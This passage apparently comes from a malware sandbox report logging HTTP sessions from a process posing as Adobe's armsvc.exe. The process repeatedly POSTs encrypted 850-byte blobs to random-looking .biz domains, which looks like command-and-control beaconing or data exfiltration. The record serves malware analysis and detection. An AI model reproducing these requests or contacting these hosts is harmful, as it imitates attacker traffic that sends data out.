                                                                                                                                                                                                                                                                        Data Ascii: ntainerNames)) {ajaxQuery(scriptPath + "/track.php"+ "?toggle=adloaded"+ "&uid=" + encodeURIComponent(uniqueTrackingID)+ "&domain=" + encodeURIComponent(domain)+ "&data=" + encodeURIComponent(JSON.stringify(data)));}},'pageLoadedCallback': fun


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.22 | 49202 | 199.59.243.228 | 80 | 3728 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:58:52.609900951 CET | 354 | OUT | GET /lderrm?usid=20&utid=14164936613 HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Host: ww7.fwiwk.biz
Jan 15, 2025 12:58:53.064865112 CET | 1236 | IN | HTTP/1.1 200 OK
    date: Wed, 15 Jan 2025 11:58:52 GMT
    content-type: text/html; charset=utf-8
    content-length: 1130
    x-request-id: a7a61546-2fe9-4ba1-9bbf-a3c97b79c402
    cache-control: no-store, max-age=0
    accept-ch: sec-ch-prefers-color-scheme
    critical-ch: sec-ch-prefers-color-scheme
    vary: sec-ch-prefers-color-scheme
    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_RTSdIaedCnPa6CqMZgtKNGqZ3MhSmzzGa7WA2r8os+Mfa+J3aFLBIEVTLfxdmO59A4483mGeKZ6MJ41BIfzJvQ==
    set-cookie: parking_session=a7a61546-2fe9-4ba1-9bbf-a3c97b79c402; expires=Wed, 15 Jan 2025 12:13:53 GMT; path=/
    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 52 54 53 64 49 61 65 64 43 6e 50 61 36 43 71 4d 5a 67 74 4b 4e 47 71 5a 33 4d 68 53 6d 7a 7a 47 61 37 57 41 32 72 38 6f 73 2b 4d 66 61 2b 4a 33 61 46 4c 42 49 45 56 54 4c 66 78 64 6d 4f 35 39 41 34 34 38 33 6d 47 65 4b 5a 36 4d 4a 34 31 42 49 66 7a 4a 76 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_RTSdIaedCnPa6CqMZgtKNGqZ3MhSmzzGa7WA2r8os+Mfa+J3aFLBIEVTLfxdmO59A4483mGeKZ6MJ41BIfzJvQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Jan 15, 2025 12:58:53.064928055 CET | 564 | IN | Data Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
    Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTdhNjE1NDYtMmZlOS00YmExLTliYmYtYTNjOTdiNzljNDAyIiwicGFnZV90aW1lIjoxNzM2OTQyMzMzLCJwYWdlX3VybCI6I


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.22 | 49204 | 34.246.200.160 | 80 | 3728 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:58:53.229257107 CET | 345 | OUT | POST /wua HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: tbjrpv.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 850
Jan 15, 2025 12:58:53.229289055 CET | 850 | OUT | Data Raw: c2 02 00 bc 95 4f ff 48 46 03 00 00 0e 0d ea 3c 38 07 7c 1a 30 80 a9 12 72 0b b2 e5 ff ef 3f b1 71 76 cc df e9 93 e0 83 99 6d fa f6 f0 55 87 d2 ca 30 9c 4b 23 ee c1 ec 28 fb 5c 6f bc 18 99 08 c6 7c 5f 6f 7c 82 04 fc eb 77 54 d7 0d 79 1c d4 57 22
    Data Ascii: OHF<8|0r?qvmU0K#(\o|_o|wTyW"=~jo@+s=WVj0j@D7MGkVhT7^4Uk`,N3p!<,ZC5}=YpMVq`;-B2Si-L#'.2wyf
Jan 15, 2025 12:58:53.952501059 CET | 410 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 15 Jan 2025 11:58:53 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=57dccea13f33a544e85cbd4f70150be7|8.46.123.189|1736942333|1736942333|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.22 | 49206 | 34.227.7.138 | 80 | 3728 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 12:58:54.072668076 CET | 356 | OUT | POST /ivjxabsxpnamgnu HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: deoci.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 850
Jan 15, 2025 12:58:54.072669029 CET | 850 | OUT | Data Raw: 4e 66 a5 84 7e 7c ac d0 46 03 00 00 32 fb 38 3a a2 f0 f4 64 ae ef 96 30 e5 85 cf 60 cd fd f8 bb 7c c6 08 70 a7 37 bd d8 8d ff c0 54 4c d3 2e 36 f4 24 1d e5 d4 1f 2c c9 a3 fa e5 31 f8 7b 84 84 15 79 ae c7 db fa 17 8e 24 19 a8 65 56 09 5d 08 20 31
    Data Ascii: Nf~|F28:d0`|p7TL.6$,1{y$eV] 1Nh/f-oF7|.w&GZ7^?eUuB IS9DuP5cx5[,4]5/oBJ]yS5#l{]}P8u+2y`Y
Jan 15, 2025 12:58:54.499115944 CET | 409 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 15 Jan 2025 11:58:54 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=353cef26a7a13170870ba023ff759699|8.46.123.189|1736942334|1736942334|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        40192.168.2.2249207208.117.43.225803728C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:54.538629055 CET357OUTPOST /dwwujsrodteum HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: gytujflc.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:54.538629055 CET850OUTData Raw: ac 64 d3 2e db 8b 85 e9 46 03 00 00 c8 08 50 0a 3f 9c 85 25 a0 71 6c e1 fe fa 8f f9 5f c9 ea 7a 81 9b 64 97 5c a7 2c 00 5c 5d 77 28 dd ad 31 04 39 12 59 09 7b 67 e8 bb ef 78 4e 9e 8b cd 8c a2 ce 7e 1b 7f 58 ca e2 ef f7 c8 65 5d 45 b4 80 e1 8e 93
                                                                                                                                                                                                                                                                        Data Ascii: d.FP?%ql_zd\,\]w(19Y{gxN~Xe]EVV't;.HXTK!`ZgS<[tKKN~%Ig'`8[w%97AE0 ,Eklh+UZ]|hy0c8\IvsOyon<
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:55.022780895 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:54 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:55.030762911 CET358OUTPOST /fmxntfwxlcjyow HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: gytujflc.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:55.030762911 CET850OUTData Raw: 0d 60 c9 d7 82 f0 87 94 46 03 00 00 9d 3c 7f 43 b8 a8 07 e3 91 b5 12 e8 2c 5e fd d7 c6 39 e1 81 73 a2 d3 ec d5 48 70 a6 af 95 ed 41 40 f4 71 fa d9 c7 66 c4 95 0f 99 27 25 ef a7 6e 94 56 b5 cc 16 8a 06 2f cb 8a 93 79 e8 d6 6f ff c2 68 28 b6 2a 7d
                                                                                                                                                                                                                                                                        Data Ascii: `F<C,^9sHpA@qf'%nV/yoh(*}E-YEtH^v0_zLAoG_#E&Vn[/J7"PRXpru'Hiyw$~dSq(K#*[eo3y*T*D
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:55.145962954 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:55 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:55.356626987 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:58:55 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.701519966 CET350OUTPOST /vattrqg HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: yunalwv.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.701549053 CET850OUTData Raw: 36 a9 e1 f1 45 b0 6a bd 46 03 00 00 8c a2 7c 99 94 76 67 f1 d4 22 3f b4 30 4d 41 d8 38 59 7b 4e 50 86 7e 9d 02 05 0a 6e 27 14 6b 93 b4 71 b1 c5 37 84 7f 5d 98 8e 60 44 29 f9 ef 39 87 65 35 d1 ae cc 88 63 0f 9e d4 20 24 00 a5 b6 b8 f3 af cb 88 04
                                                                                                                                                                                                                                                                        Data Ascii: 6EjF|vg"?0MA8Y{NP~n'kq7]`D)9e5c $')fA|LBkB_)=8 9PH_46ba3^AKx`V4S8&by>LU?RyNl6&P4G`Ca:uC9%bM%1D0
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.815042019 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:59:01 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.865535975 CET347OUTPOST /egbl HTTP/1.1
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Host: yunalwv.biz
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                        Content-Length: 850
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.865595102 CET850OUTData Raw: 33 78 dc 86 b7 8a 10 ee 46 03 00 00 54 29 84 15 9f 03 86 fe f1 93 0b b9 2c 40 27 dc 10 32 1c 34 7b 1e f3 af 4c 8e 19 f1 d5 9f 02 46 bf e8 c7 b5 4e 8d 6d ef cd ec 23 b6 25 63 bd 7a 07 3e c6 e6 4e 72 b6 de c6 a4 c7 c2 4f 07 2f 97 8f f0 5c 76 47 3d
                                                                                                                                                                                                                                                                        Data Ascii: 3xFT),@'24{LFNm#%cz>NrO/\vG=Ht)63hY/kI0,XQ7.#7?oh8^Q}ihA3/PuhSt3;h{2.@dE$/,rso@ES9pRu+~hRh&vJ
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.040879965 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                        Date: Wed, 15 Jan 2025 11:59:01 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
41         | 192.168.2.22 | 49209       | 13.251.16.150  | 80               | 3728 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp                           | Bytes transferred | Direction | Data
Jan 15, 2025 12:58:55.175888062 CET | 349               | OUT       | POST /ekhmfom HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: qaynky.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 850
Jan 15, 2025 12:58:55.175928116 CET | 850               | OUT       | Data Raw: d6 69 41 76 4b 5e a6 b9 46 03 00 00 51 64 15 dc eb a8 3f 43 e5 09 28 65 05 12 f1 b5 a7 96 ce 1c 45 d1 a7 70 70 8a d1 0d f4 57 02 d5 5c 06 09 bd 5c 7d 23 e7 5b 14 54 20 b3 f0 b8 d0 bb 8c 3c 6f c6 0b 08 34 9e a7 b4 45 36 09 af e0 46 63 a2 b4 60 5f
    Data Ascii: iAvK^FQd?C(eEppW\\}#[T <o4E6Fc`_;ZM;IvF$BY5dA<Q7-TZtLnYf?X`85K_.}>jI+Xv\UqQi|Xnx1WJNk
Jan 15, 2025 12:58:56.542937040 CET | 410               | IN        | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 15 Jan 2025 11:58:56 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
